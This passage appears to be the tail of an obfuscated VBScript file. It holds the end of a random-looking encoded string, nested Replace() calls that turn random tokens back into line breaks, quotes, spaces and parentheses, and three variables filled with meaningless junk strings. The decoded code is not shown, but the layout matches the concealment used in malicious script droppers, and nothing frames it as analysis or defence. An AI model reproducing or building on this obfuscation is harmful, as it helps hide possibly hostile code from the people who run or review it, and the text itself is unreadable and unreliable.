sSpwKlLgxHKnlhbHxMjePdUqoUIePWOsJmhGMKNgZCCljtcejbOetaerCraRQqywppqYlvGmKFxxFgG=raRQqywppqYlvGmKFxxFgGosfraRQqywppqYlvGmKFxxFgGteSrWItPPEDIDlNmvHfmFLmrWItPPEDIDlNmvHfmFLm"),"mLFmfHvmNlDIDEPPtIWr",vbCrLf),"jMxHbhlnKHxgLlKwpSsRRODrPWoSdY",""""),"GgFxxFKmGvlYqppwyqQRar"," "),"jlCCZgNKMGhmJsOWPeIUoqUdPe","("),"ZNMgGfXCLORiidIEpq",")"))
gHMmJFZzTEyDiaAs = "FvBnlzLgFFFzvBhXkgGgmzVbCVhknFvoAySQWerarSoSOIiUeqaUSuPPEpuiRq"
vCBbhMMFXFrqEiwUEUWS = "jxvZVHgfFVXvkGmVFhKkzhhVZXGNBkcXIuqdtApRUOYeYYaTAyDUiIoSDSwIDIoO"
vgcGFlJzfDuiPwqUiY = "nGNLxZczLLVcVnpDUESRTyWORwdt"